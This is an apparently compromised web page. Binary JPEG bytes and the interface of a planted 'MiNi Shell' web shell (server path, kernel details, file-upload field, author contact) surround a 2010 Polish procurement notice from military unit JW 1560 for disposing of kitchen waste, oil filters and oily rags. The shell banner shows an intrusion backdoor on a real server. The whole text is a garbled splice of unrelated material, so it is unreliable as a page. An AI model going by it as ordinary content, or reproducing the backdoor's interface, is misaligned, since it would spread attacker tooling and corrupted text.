JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100120/16556-N-2010.html

<p class="kh_header"><b>Warszawa: USŁUGA UTYLIZACJI W ODDZIALE GOSPODARCZYM JEDNOSTKI WOJSKOWEJ 1560</b><br>
<b>Numer ogłoszenia: 16556 - 2010; data zamieszczenia: 20.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 1560 , ul. Radiowa 2, 00-908 Warszawa, woj. mazowieckie, tel. 022 6855036, 6855297, faks 022 6855101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http.//www.jw1560.wp.mil.pl  -  www.jw1560.m.win.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Wojskowa Jednostka Budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA UTYLIZACJI W ODDZIALE GOSPODARCZYM JEDNOSTKI WOJSKOWEJ 1560.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) ZAKRES NR 1 - UTYLIZACJA ODPADÓW POKONSUMPCYJNYCH:
a) w ramach zamówienia Wykonawca dokonywał będzie odbioru i utylizacji odpadów kat. 3 o kodzie 20 01 08 - odpady kuchenne ulegające biodegradacji, własnym środkiem transportu oraz dodatkowo dostarczy (użyczając zamawiającemu) odpowiednie pojemniki w ilości wymaganej przez Zamawiającego i odpowiednio je rozmieści na własny koszt, jak również wyposaży poszczególne Jednostki Wojskowe w urządzenia do przechowywania i schładzania odpadów, nie obciążając jednostek ewidencyjnie i finansowo;
b) odbiór odpadów będzie następował w pojemnikach będących własnością wykonawcy;
c) odbiór odpadów z Jednostki Wojskowej 1560, Jednostki Wojskowej 1037, Jednostki Wojskowej 2361 i Jednostki Wojskowej 2370 zgłaszany będzie telefonicznie lub faxem, według potrzeb, minimum dwa razy w tygodniu z każdej z Jednostek Wojskowych;
d) przewidywana całkowita ilość roczna odpadów wyniesie 41 000 kg (w tym Jednostka Wojskowa 1560 /stołówka żołnierska i Punkt Żywienia Kadry/ 20.000 kg, pozostałe Jednostki Wojskowe po 7.000 kg);
e) Zamawiający przewiduje prawo opcji o wielkości 20% przedmiotu zamówienia:
- ilości określone w prawie opcji są ilościami szacunkowymi (maksymalnymi) Zamawiający może z nich skorzystać, lecz nie musi;
- Z tytułu niewykorzystania (nie odebrania) przez Zamawiającego ilości w prawie opcji, Wykonawcy nie przysługują żadne roszczenia finansowe ani prawne;
f) w przypadku, gdy zdaniem Zamawiającego zaistnieją okoliczności wymagające realizacji dodatkowych ilości wówczas Zamawiający może je zlecić w ramach zamówienia uzupełniającego z Wykonawcą umowy po cenie jednostkowej określonej w ofercie Wykonawcy, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego;
g) obciążenie Zamawiającego za wykonaną usługę będzie następowało z dołu, miesięcznie, fakturą wystawioną do 10-go dnia następnego miesiąca, dla każdej Jednostki Wojskowej osobno (płatnikiem jest Jednostka Wojskowa 1560).
2) ZAKRES NR 2 - UTYLIZACJA FILTRÓW OLEJU, PALIWA, POWIETRZA ORAZ CZYŚCIWA ZAOLEJONEGO:
a) w ramach zamówienia Wykonawca dokonywał będzie odbioru i utylizacji odpadów o kodzie 16 01 07 - filtry oleju, paliwa i powietrza, własnym środkiem transportu w przewidywanej maksymalnej, łącznej ilości rocznej odpadu 1000 kg  (w tym Jednostka Wojskowa 1560 - 400 kg, Jednostka Wojskowa 1037 - 200 kg, Jednostka Wojskowa 2361 - 200 kg i Jednostka Wojskowa 2370 - 200 kg);
b) w ramach zamówienia Wykonawca dokonywał będzie odbioru i utylizacji odpadów o kodzie 15 02 02 - czyściwo zaolejone, własnym środkiem transportu, w przewidywanej maksymalnej, łącznej ilości rocznej odpadu 1000 kg (w tym Jednostka Wojskowa 1560 - 400 kg, Jednostka Wojskowa 1037- 200 kg, Jednostka Wojskowa 2361 - 200 kg i Jednostka Wojskowa 2370 - 200 kg);
c) Wykonawca dostarczy w okresie 2 tygodni od dnia podpisania umowy pojemniki w ilości wymaganej przez Zamawiającego, tj. 8 sztuk i odpowiednio je rozmieści, tj. po 2 sztuki w Jednostce Wojskowej 1560, w Jednostce Wojskowej 1037, w Jednostce Wojskowej 2361 i w Jednostce Wojskowej 2370 na własny koszt;
d) odbiór odpadów będzie następował w pojemnikach będących własnością wykonawcy,
e) odbiór odpadów z Jednostki Wojskowej 1560, Jednostki Wojskowej 1037, Jednostki Wojskowej 2361 i Jednostki Wojskowej 2370 odbędzie się dwukrotnie w ciągu roku: do końca czerwca i do końca listopada, w dwóch równych partiach;
f) obciążenie Zamawiającego za wykonaną usługę będzie następowało z dołu, fakturą wystawioną do 10-go dnia następnego miesiąca po wykonanej usłudze, dla każdej Jednostki Wojskowej osobno (płatnikiem jest JW 1560)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.40.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunek nr 1 - Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, a w szczególności:
1) zezwolenie w formie Decyzji Wojewody, zezwalające na transport, magazynowanie i unieszkodliwianie odpadów niebezpiecznych (odpowiednio do zakresu składanej oferty): odpady kuchenne ulegające biodegradacji - kod 20 01 08, filtry oleju, paliwa, powietrza - kod 16 01 07, czyściwo zaolejone - kod 15 02 02, w sposób zgodny z zasadami gospodarowania odpadami oraz wymogami ochrony środowiska określonymi w ustawie z dnia 27 kwietnia 2001r. Prawo ochrony środowiska (t. j. Dz. U. z 2008 Nr 25, poz. 150 z późn. zm.) oraz w ustawie z dnia 27 kwietnia 2001r. o odpadach (t. j. Dz. U. z 2007 Nr 39, poz. 251 z późn. zm.), jak również aktami wykonawczymi do tych ustaw, od momentu odbioru odpadów do zakończenia ich unieszkodliwiania;
ważne w całym okresie realizacji przedmiotu zamówienia
2) przedstawi oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie określonym w art. 22 ust. 1 pkt 1.
2. Warunek nr 2 - Wykonawca posiada wiedzę i doświadczenie, a w szczególności:
1) przedstawi oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie określonym w art. 22 ust. 1 pkt 2.
3. Warunek nr 3 - Wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, a w szczególności:
1) przedstawi oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie określonym w art. 22 ust. 1 pkt 3.
4. Warunek nr 4 - Wykonawca spełnia Warunek dotyczący sytuacji ekonomicznej i finansowej, a w szczególności:
1) przedstawi oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie określonym w art. 22 ust. 1 pkt 4.
5. Warunek nr 5 - Wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia, a w szczególności:  
1) przedstawi aktualny odpis z właściwego rejestru;
2) przedstawi aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3) przedstawi aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy;
4) przedstawi aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy;
5) przedstawi oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie określonym w art. 24 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Zezwolenie w formie Decyzji Wojewody, zezwalające na transport, magazynowanie i unieszkodliwianie odpadów niebezpiecznych (odpowiednio do zakresu składanej oferty): odpady kuchenne ulegające biodegradacji - kod 20 01 08, filtry oleju, paliwa, powietrza - kod 16 01 07, czyściwo zaolejone - kod 15 02 02, w sposób zgodny z zasadami gospodarowania odpadami oraz wymogami ochrony środowiska określonymi w ustawie z dnia 27 kwietnia 2001r. Prawo ochrony środowiska 
(t. j. Dz. U. z 2008 Nr 25, poz. 150 z późn. zm.) oraz w ustawie z dnia 27 kwietnia 2001r. o odpadach (t. j. Dz. U. z 2007 Nr 39, poz. 251 z późn. zm.), jak również aktami wykonawczymi do tych ustaw, od momentu odbioru odpadów do zakończenia ich unieszkodliwiania - kserokopia poświadczona za zgodność z oryginałem,  dokument wystawiony przez uprawnione do tego celu organy administracji państwowej, ważny w całym okresie realizacji przedmiotu zamówienia - w jednym egzemplarzu.
W przypadku Wykonawców wspólnie ubiegających się o zamówienie, dokument składa każdy z Wykonawców.
2. Aktualny odpis z właściwego rejestru - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert -  kserokopia potwierdzona za zgodność z oryginałem w jednym  egzemplarzu. 
W przypadku Wykonawców wspólnie ubiegających się o zamówienie, dokument składa każdy z Wykonawców.
3. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - kserokopia potwierdzona za zgodność z oryginałem, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, w jednym egzemplarzu. 
W przypadku Wykonawców wspólnie ubiegających się o zamówienie, dokument składa każdy z Wykonawców.
4. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - kserokopia potwierdzona za zgodność z oryginałem, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - w jednym egzemplarzu.  
W przypadku Wykonawców wspólnie ubiegających się o zamówienie, dokument składa każdy z Wykonawców.
5. Aktualna informacja z Krajowego Rejestru Karnego - osobowa albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - kserokopia potwierdzona za zgodność z oryginałem - w jednym egzemplarzu dla wszystkich osób wymienionych w Rejestrze Sądowym w pozycji organ uprawniony do reprezentacji lub w zaświadczeniu o wpisie do ewidencji działalności gospodarczej w oznaczeniu podmiotu, w jednym egzemplarzu.
W przypadku Wykonawców wspólnie ubiegających się o zamówienie, dokument składa każdy z Wykonawców.
6. Aktualna informacja z Krajowego Rejestru Karnego - podmiotowa w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - kserokopia potwierdzona za zgodność z oryginałem - w jednym egzemplarzu.
W przypadku Wykonawców wspólnie ubiegających się o zamówienie, dokument składa każdy z Wykonawców.
7. Oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie określonym w art. 22 ust. 1 pkt 1 - 4 ustawy - opracowany według druku dołączonego - Załącznik nr 2 do SIWZ.
W przypadku wykonawców wspólnie ubiegających się o zamówienie składają wszyscy ubiegający się o udzielenie zamówienia przez złożenie podpisu na jednym formularzu oświadczenia przez każdego z nich/pełnomocnika.
8. Oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie określonym w art. 24 ustawy - opracowany według druku dołączonego - Załącznik nr 3 do SIWZ
W przypadku Wykonawców wspólnie ubiegających się o zamówienie, dokument składa każdy z Wykonawców..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http.//www.jw1560.wp.mil.pl  -  www.jw1560.m.win.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 1560
ul. Radiowa 2, 00-908 Warszawa 
BUDYNEK NR 86, parter, pok. 10 - Sekcja Zamówień Publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2010 godzina 11:00, miejsce: Jednostka Wojskowa
ul. Radiowa 2, 00-908 Warszawa 
BUDYNEK NR 86, II piętro, pok. 207 - Kancelaria Jawna.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> UTYLIZACJA ODPADÓW POKONSUMPCYJNYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) w ramach zamówienia Wykonawca dokonywał będzie odbioru i utylizacji odpadów kat. 3 o kodzie 20 01 08 - odpady kuchenne ulegające biodegradacji, własnym środkiem transportu oraz dodatkowo dostarczy (użyczając zamawiającemu) odpowiednie pojemniki w ilości wymaganej przez Zamawiającego i odpowiednio je rozmieści na własny koszt, jak również wyposaży poszczególne Jednostki Wojskowe w urządzenia do przechowywania i schładzania odpadów, nie obciążając jednostek ewidencyjnie i finansowo;
b) odbiór odpadów będzie następował w pojemnikach będących własnością wykonawcy;
c) odbiór odpadów z Jednostki Wojskowej 1560, Jednostki Wojskowej 1037, Jednostki Wojskowej 2361 i Jednostki Wojskowej 2370 zgłaszany będzie telefonicznie lub faxem, według potrzeb, minimum dwa razy w tygodniu z każdej z Jednostek Wojskowych;
d) przewidywana całkowita ilość roczna odpadów wyniesie 41 000 kg (w tym Jednostka Wojskowa 1560 /stołówka żołnierska i Punkt Żywienia Kadry/ 20.000 kg, pozostałe Jednostki Wojskowe po 7.000 kg);
e) Zamawiający przewiduje prawo opcji o wielkości 20% przedmiotu zamówienia:
- ilości określone w prawie opcji są ilościami szacunkowymi (maksymalnymi) Zamawiający może z nich skorzystać, lecz nie musi;
- Z tytułu niewykorzystania (nie odebrania) przez Zamawiającego ilości w prawie opcji, Wykonawcy nie przysługują żadne roszczenia finansowe ani prawne;
f) w przypadku, gdy zdaniem Zamawiającego zaistnieją okoliczności wymagające realizacji dodatkowych ilości wówczas Zamawiający może je zlecić w ramach zamówienia uzupełniającego z Wykonawcą umowy po cenie jednostkowej określonej w ofercie Wykonawcy, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego;
g) obciążenie Zamawiającego za wykonaną usługę będzie następowało z dołu, miesięcznie, fakturą wystawioną do 10-go dnia następnego miesiąca, dla każdej Jednostki Wojskowej osobno (płatnikiem jest Jednostka Wojskowa 1560)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.40.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> UTYLIZACJA FILTRÓW OLEJU, PALIWA, POWIETRZA ORAZ CZYŚCIWA ZAOLEJONEGO.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) w ramach zamówienia Wykonawca dokonywał będzie odbioru i utylizacji odpadów o kodzie 16 01 07 - filtry oleju, paliwa i powietrza, własnym środkiem transportu w przewidywanej maksymalnej, łącznej ilości rocznej odpadu 1000 kg  (w tym Jednostka Wojskowa 1560 - 400 kg, Jednostka Wojskowa 1037 - 200 kg, Jednostka Wojskowa 2361 - 200 kg i Jednostka Wojskowa 2370 - 200 kg);
b) w ramach zamówienia Wykonawca dokonywał będzie odbioru i utylizacji odpadów o kodzie 15 02 02 - czyściwo zaolejone, własnym środkiem transportu, w przewidywanej maksymalnej, łącznej ilości rocznej odpadu 1000 kg (w tym Jednostka Wojskowa 1560 - 400 kg, Jednostka Wojskowa 1037- 200 kg, Jednostka Wojskowa 2361 - 200 kg i Jednostka Wojskowa 2370 - 200 kg);
c) Wykonawca dostarczy w okresie 2 tygodni od dnia podpisania umowy pojemniki w ilości wymaganej przez Zamawiającego, tj. 8 sztuk i odpowiednio je rozmieści, tj. po 2 sztuki w Jednostce Wojskowej 1560, w Jednostce Wojskowej 1037, w Jednostce Wojskowej 2361 i w Jednostce Wojskowej 2370 na własny koszt;
d) odbiór odpadów będzie następował w pojemnikach będących własnością wykonawcy,
e) odbiór odpadów z Jednostki Wojskowej 1560, Jednostki Wojskowej 1037, Jednostki Wojskowej 2361 i Jednostki Wojskowej 2370 odbędzie się dwukrotnie w ciągu roku: do końca czerwca i do końca listopada, w dwóch równych partiach;
f) obciążenie Zamawiającego za wykonaną usługę będzie następowało z dołu, fakturą wystawioną do 10-go dnia następnego miesiąca po wykonanej usłudze, dla każdej Jednostki Wojskowej osobno (płatnikiem jest JW 1560)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.40.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com